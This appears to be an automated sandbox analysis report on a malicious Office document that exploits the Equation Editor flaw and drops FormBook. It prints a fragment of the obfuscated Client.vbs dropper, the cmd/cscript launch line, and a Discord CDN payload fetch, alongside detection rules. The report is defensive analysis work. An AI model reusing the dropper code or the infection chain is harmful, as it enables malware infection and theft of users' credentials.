          Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
          Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
          Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
          Source: explorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 0000000C.00000000.498844779.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 0000000C.00000000.498844779.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: WINWORD.EXE, 00000000.00000002.566514221.00000000078AE000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
          Source: WINWORD.EXE, 00000000.00000002.566514221.00000000078AE000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
          Source: WINWORD.EXE, 00000000.00000002.561296439.0000000004440000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.490593119.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: cscript.exe, 00000006.00000002.414747436.0000000001FB0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 0000000C.00000000.498844779.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 0000000C.00000000.503719352.00000000083FD000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.510382629.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.493209706.00000000045D6000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 0000000C.00000000.532738537.0000000008374000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.495179620.0000000008374000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.513635370.0000000008374000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 0000000C.00000000.498844779.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: WINWORD.EXE, 00000000.00000002.561296439.0000000004440000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.490593119.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 0000000C.00000000.498844779.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 0000000C.00000000.530879948.000000000449C000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.509117960.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 0000000C.00000000.530879948.000000000449C000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.509117960.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp2__
          Source: explorer.exe, 0000000C.00000000.530879948.000000000449C000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.509117960.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 0000000C.00000000.503719352.00000000083FD000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.531077860.000000000457A000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.493099167.000000000457A000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.509247877.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 0000000C.00000000.503719352.00000000083FD000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.531077860.000000000457A000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.493099167.000000000457A000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 0000000C.00000000.509247877.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 0000000C.00000000.509247877.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.495179620.0000000008374000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.513635370.0000000008374000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 0000000C.00000000.510382629.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.493209706.00000000045D6000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3C4C0964-F4E2-47CE-9342-09F02AAEAA3F}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: google.com
          Source: global trafficHTTP traffic detected: GET /attachments/915347845752705109/915799206072045578/m.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cdn.discordapp.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /t1st/?axoXKTD=uTpqzRmP4oAoFu5bW/C1NBvei3ZEHQ9lndq23HdAXkDs/tJRE4xymzeaNit+87gYgYiprQ==&bx=7nL09FJ HTTP/1.1Host: www.milan-sites.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
          Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.22:49165 version: TLS 1.2
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASSJump to behavior

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Document contains OLE streams which likely are hidden ActiveX objectsShow sources
          Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.drStream path '_1699974670/\x1Ole10Native' : .!....Client.vbs.C:\Path\Client.vbs.........C:\Pat
          Malicious sample detected (through community Yara rule)Show sources
          Source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs
          Document contains OLE streams with names of living off the land binariesShow sources
          Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.drStream path '_1699974670/\x1Ole10Native' : .!....Client.vbs.C:\Path\Client.vbs.........C:\Path\Client.vbs..!..SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..sKeys0xCRC341414141 = Eval (E0xCRC341414141(")"""",emaNtpircS.tpircSW,emaNlluFtpircS.tpircSW(ecalper"))..GetObject (E0xCRC341414141("B0A85DF40C00-9BDA-0D11-0FC1-62CD539F:wen"))..F = lValue0xCRC341414141 + "\" + WScript.ScriptName..If sKeys0xCRC341414141 = lValue0xCRC341414141 Then..WScript.Quit()..SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..Else..End If........Function F0xCRC341414141()..Execute("TristateUseDefault0xCRC341414141= ArRAy (""eT"",""aE"",""rC"")")..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..F0xCRC341414141 = E0xCRC341414141( Join (TristateUseDefault0xCRC341414141,""))..End Function........Function G0xCRC341414141()..G0xCRC341414141 = "\toor\.\\!}etanosrepmi=leveL"..End Function........Function H0xCRC341414141()..H0xCRC341414141 = "noitanosrepmi{:stmgmniw"..End Function........Function I0xCRC341414141()..I0xCRC341414141 = E0xCRC341414141 ("putratSssecorP_23niW")..End Function........Function J0xCRC341414141()..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..J0xCRC341414141 = "hsre"..End Function........D0xCRC341414141()........Function E0xCRC341414141(str)..If Left(g_DumpDir,2) <> "\\" Then..DriveName = Left(g_DumpDir,1)..Else..strAux = Right(g_DumpDir, Len(g_DumpDir) - 2)..arrAux = Split(strAux, "\", -1) ..DriveName = "\\" & arrAux(0) & "\" & arrAux(1)..End If..Length = 8..objArgs = 5..If Length = objArgs Then..Else..GetStringArray = Len(str)..a = Left(str,1)..For i = 1 To GetStringArray..arrStrings = Eval("Lef" + "t(s" + "tr,i)")..If Len(arrStrings)> 1 Then..strSeparator = Right(arrStrings,1) & strTemp..strTemp = strSeparator ..End If..Next..E0xCRC341414141 = strTemp & a..End If..End Function........Sub B0xCRC341414141(CO0xCRC341414141)..Set ProductData0xCRC341414141 = GetObject (SPLevel0xCRC341414141 + "CiMv2")..Set ConvertToKey0xCRC341414141 = ProductData0xCRC341414141.Get (I0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..Set KeyOffset0xCRC341414141 = ConvertToKey0xCRC341414141.SpawnInstance_..KeyOffset0xCRC341414141.ShowWindow = 0..Execute("SeT Data0xCRC341414141 = ProductData0xCRC341414141.Get (""WiN32_PrOceSs"")")..Set isWin80xCRC341414141 = Da
          Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.drStream path '_1699974672/Equation Native' : ..................\...[.............ZZCmD.exe /C cscript %tmp%\Client.vbs A..C................................................................................................................
          Very long command line foundShow sources
          Source: unknownProcess created: Commandline size = 4089
          Microsoft Office drops suspicious filesShow sources
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Client.vbsJump to behavior
          Found suspicious RTF objectsShow sources
          Source: Client.vbsStatic RTF information: Object: 0 Offset: 000011FEh Client.vbs
          Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.drOLE indicator application name: unknown
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041E81411_2_0041E814
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0040103011_2_00401030
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041DB3411_2_0041DB34
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041EB8A11_2_0041EB8A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00402D9011_2_00402D90
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00409E5B11_2_00409E5B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00409E6011_2_00409E60
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00402FB011_2_00402FB0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B4E0C611_2_00B4E0C6
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B7D00511_2_00B7D005
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B6905A11_2_00B6905A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B5304011_2_00B53040
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B4E2E911_2_00B4E2E9
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00BF123811_2_00BF1238
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00BF63BF11_2_00BF63BF
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B763DB11_2_00B763DB
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B4F3CF11_2_00B4F3CF
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B5230511_2_00B52305
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B9A37B11_2_00B9A37B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B5735311_2_00B57353
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B8548511_2_00B85485
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B6148911_2_00B61489
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B8D47D11_2_00B8D47D
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B6C5F011_2_00B6C5F0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B5351F11_2_00B5351F
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B9654011_2_00B96540
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B5468011_2_00B54680
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B5E6C111_2_00B5E6C1
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B9A63411_2_00B9A634
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00BF262211_2_00BF2622
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B5C7BC11_2_00B5C7BC
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00BD579A11_2_00BD579A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B857C311_2_00B857C3
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00BEF8EE11_2_00BEF8EE
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B7286D11_2_00B7286D
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B5C85C11_2_00B5C85C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B529B211_2_00B529B2
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00BF098E11_2_00BF098E
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B669FE11_2_00B669FE
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00BD595511_2_00BD5955
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00C03A8311_2_00C03A83
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00BFCBA411_2_00BFCBA4
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B4FBD711_2_00B4FBD7
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00BDDBDA11_2_00BDDBDA
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B77B0011_2_00B77B00
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00BEFDDD11_2_00BEFDDD
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B80D3B11_2_00B80D3B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B5CD5B11_2_00B5CD5B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B82E2F11_2_00B82E2F
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B6EE4C11_2_00B6EE4C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00BECFB111_2_00BECFB1
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B60F3F11_2_00B60F3F
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B7DF7C11_2_00B7DF7C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0238123813_2_02381238
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022DE2E913_2_022DE2E9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022E230513_2_022E2305
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0232A37B13_2_0232A37B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022E735313_2_022E7353
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022DF3CF13_2_022DF3CF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_023063DB13_2_023063DB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0230D00513_2_0230D005
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022E304013_2_022E3040
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022F905A13_2_022F905A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022DE0C613_2_022DE0C6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0238262213_2_02382622
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022E468013_2_022E4680
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022EE6C113_2_022EE6C1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022EC7BC13_2_022EC7BC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0236579A13_2_0236579A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_023157C313_2_023157C3
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0231D47D13_2_0231D47D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022F148913_2_022F1489
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0231548513_2_02315485
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022E351F13_2_022E351F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0232654013_2_02326540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022FC5F013_2_022FC5F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_02393A8313_2_02393A83
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_02307B0013_2_02307B00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0238CBA413_2_0238CBA4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0236DBDA13_2_0236DBDA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022DFBD713_2_022DFBD7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0230286D13_2_0230286D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022EC85C13_2_022EC85C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0237F8EE13_2_0237F8EE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0236595513_2_02365955
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022E29B213_2_022E29B2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0238098E13_2_0238098E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022F69FE13_2_022F69FE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_02312E2F13_2_02312E2F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022FEE4C13_2_022FEE4C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022F0F3F13_2_022F0F3F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0230DF7C13_2_0230DF7C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_02310D3B13_2_02310D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022ECD5B13_2_022ECD5B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0237FDDD13_2_0237FDDD
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008E81413_2_0008E814
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008EB8A13_2_0008EB8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00072D9013_2_00072D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00079E5B13_2_00079E5B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00079E6013_2_00079E60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00072FB013_2_00072FB0
          Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
